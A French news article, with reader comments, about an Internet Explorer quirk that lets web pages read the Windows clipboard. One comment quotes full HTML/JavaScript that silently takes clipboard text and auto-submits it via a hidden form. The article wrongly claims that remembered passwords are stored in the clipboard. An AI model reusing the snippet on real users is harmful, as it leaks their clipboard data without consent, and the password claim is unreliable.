Nouvelle faille dans Internet Explorer
Un développeur indépendant vient de (re)découvrir une particularité d'Internet Explorer qui pourrait causer des problèmes de sécurité.
Un développeur indépendant vient de (re)découvrir une particularité d'Internet Explorer qui pourrait causer des problèmes de sécurité.
Le forum du site AmigaWorld rapporte une conversation à l'origine de laquelle on trouve une fonctionnalité bien particulière d'Internet Explorer. En effet, en employant un code PHP approprié, il est possible de lire le contenu de votre Presse-Papier directement dans une page du navigateur Internet de Microsoft.
Le Presse-Papier de Windows, au nom si peu évocateur en français (il s'appelle Clipboard en anglais), est une petite application très pratique qui garde temporairement en mémoire des données, pendant que vous faites un copier-coller, par exemple. Certains logiciels permettent d'augmenter la capacité de cet accessoire, tandis que la fonction Nettoyage de Disque (et la plupart des logiciels tiers qui assurent les mêmes fonctions) peut le "purger" de tout ce qu'il contient. Il se vide en général automatiquement lorsque vous fermez votre session Windows, de toute façon.
Oui mais voilà, pendant votre session, vous pouvez y stocker quantités de choses, sans même vous en rendre compte. Ainsi, lorsque vous visitez un site sécurisé pour la première fois, une fois rentré votre identifiant et votre mot de passe, Windows vous propose de les mémoriser. Si vous cliquez sur "Oui", ces données seront stockées dans le Presse-Papier, avant d'être transférées dans un répertoire spécifique lorsque vous quittez l'application qui vous sert à naviguer sur le Web, et/ou quand vous éteignez votre PC.
Cette fonctionnalité, pour pratique qu'elle soit, présente donc de sérieux risques, si on sait les exploiter. Il semblerait en effet que quelques lignes de code en PHP, soigneusement imbriquées dans le code d'une page Web, convainque Internet Explorer de communiquer le contenu du Presse-Papier. Par exemple, en remplissant un simple formulaire en ligne, vous pouvez, sans vous en rendre compte, renseigner en fait les cases d'une base de données. De plus, il existe des logiciels qui permettent d'extraire le contenu du Presse-Papier, à condition qu'on les aide un peu. La particularité d'Internet Explorer dont il est question ici leur donne un sérieux coup de main...
Les autres navigateurs Internet les plus utilisés de nos jours (Mozilla Firefox, Opera, Safari, etc...) sont insensibles à cet artifice, mais les sur-couches d'Internet Explorer (Maxthon, Avant, SlimBrowser, etc...) sont concernées. Pire, un bêta-testeur qui participe au développement d'Internet Explorer 7 confirme que cette faille, si on peut l'appeler ainsi, existe toujours dans les actuelles versions de test du futur navigateur Web de Microsoft...
Les plus curieux d'entre vous peuvent tester par eux-mêmes cette "faille", en mettant quelque chose en mémoire dans le Presse-Papier de Windows (par exemple, le texte de cette news...), puis en cliquant sur ce lien. Sous Internet Explorer, vous devriez voir apparaître ce que vous avez mémorisé. Sous Firefox ou Opera, par exemple, vous aurez juste un petit message d'excuse, vous indiquant que le tour de magie n'a pas fonctionné.
Garanti sans danger, quoique... Si vous êtes cardiaque...
Le forum du site AmigaWorld rapporte une conversation à l'origine de laquelle on trouve une fonctionnalité bien particulière d'Internet Explorer. En effet, en employant un code PHP approprié, il est possible de lire le contenu de votre Presse-Papier directement dans une page du navigateur Internet de Microsoft.Le Presse-Papier de Windows, au nom si peu évocateur en français (il s'appelle Clipboard en anglais), est une petite application très pratique qui garde temporairement en mémoire des données, pendant que vous faites un copier-coller, par exemple. Certains logiciels permettent d'augmenter la capacité de cet accessoire, tandis que la fonction Nettoyage de Disque (et la plupart des logiciels tiers qui assurent les mêmes fonctions) peut le "purger" de tout ce qu'il contient. Il se vide en général automatiquement lorsque vous fermez votre session Windows, de toute façon.
Oui mais voilà, pendant votre session, vous pouvez y stocker quantités de choses, sans même vous en rendre compte. Ainsi, lorsque vous visitez un site sécurisé pour la première fois, une fois rentré votre identifiant et votre mot de passe, Windows vous propose de les mémoriser. Si vous cliquez sur "Oui", ces données seront stockées dans le Presse-Papier, avant d'être transférées dans un répertoire spécifique lorsque vous quittez l'application qui vous sert à naviguer sur le Web, et/ou quand vous éteignez votre PC.
Cette fonctionnalité, pour pratique qu'elle soit, présente donc de sérieux risques, si on sait les exploiter. Il semblerait en effet que quelques lignes de code en PHP, soigneusement imbriquées dans le code d'une page Web, convainque Internet Explorer de communiquer le contenu du Presse-Papier. Par exemple, en remplissant un simple formulaire en ligne, vous pouvez, sans vous en rendre compte, renseigner en fait les cases d'une base de données. De plus, il existe des logiciels qui permettent d'extraire le contenu du Presse-Papier, à condition qu'on les aide un peu. La particularité d'Internet Explorer dont il est question ici leur donne un sérieux coup de main...
Les autres navigateurs Internet les plus utilisés de nos jours (Mozilla Firefox, Opera, Safari, etc...) sont insensibles à cet artifice, mais les sur-couches d'Internet Explorer (Maxthon, Avant, SlimBrowser, etc...) sont concernées. Pire, un bêta-testeur qui participe au développement d'Internet Explorer 7 confirme que cette faille, si on peut l'appeler ainsi, existe toujours dans les actuelles versions de test du futur navigateur Web de Microsoft...
Les plus curieux d'entre vous peuvent tester par eux-mêmes cette "faille", en mettant quelque chose en mémoire dans le Presse-Papier de Windows (par exemple, le texte de cette news...), puis en cliquant sur ce lien. Sous Internet Explorer, vous devriez voir apparaître ce que vous avez mémorisé. Sous Firefox ou Opera, par exemple, vous aurez juste un petit message d'excuse, vous indiquant que le tour de magie n'a pas fonctionné.
Garanti sans danger, quoique... Si vous êtes cardiaque...
Cette page peut contenir des liens affiliés. Si vous achetez un produit depuis ces liens, le site marchand nous reversera une commission sans que cela n'impacte en rien le montant de votre achat. En savoir plus.
Complément d'information
-
![Plundervolt : une nouvelle faille dans les processeurs Intel]()
Une nouvelle faille importante vient d'être découverte au sein des processeurs Intel, elle a été baptisée Plundervolt. -
![Intel : Après Meltdown et Spectre, découverte d'une nouvelle faille dans le service AMT]()
Alors qu'Intel est déjà empêtré dans le scandale Meltdown et Spectre, une nouvelle faille vient d'être découverte dans ses services.
Vos commentaires Page 1 / 3
Effectivement, après lecture du code,je constate qu'il ne s'agit aps de PHP mais de javascript , langage interprété chez le client.
C'est beaucoup plus logique...
Sous Mozilla / Firefox, page blanche.
Avec IE:
"Here's how I did it:
<html>
<head>
<title>GNAA Last Measure v4.1 by Rucas with Armorfist's PopupByPasser Mod.</title>
</head>
<body>
<form name="clip" method="post" action="test.php" style="display:none">
<input type="text" name="content">
<input type="submit">
</form>
<script language="javascript">
//without this if statement check, it bombs out with an error
if(typeof clipboardData != 'undefined') {
var content = clipboardData.getData("Text");
document.forms["clip"].elements["content"].value = content;
}
document.forms["clip"].submit();
</script>
</body>
</html>
Ceci dit le php peut très bien généré du javascript.
A+
ca va troller alors bonne chance aux admirateurs d'IE (s'il en reste...)
(mode troll off)
bonne journée
C'est très rapide de voir que le php ne sert ici qu'à une chose, regarder le user agent...
Qui ici n'a jamais vu sous windows un site qui montre le contenu de c: dans une page pour essayer de vendre un antivirus '
"session"
"cession" ca marche aussi
Enfin de toute manière on est en sécurité nulle part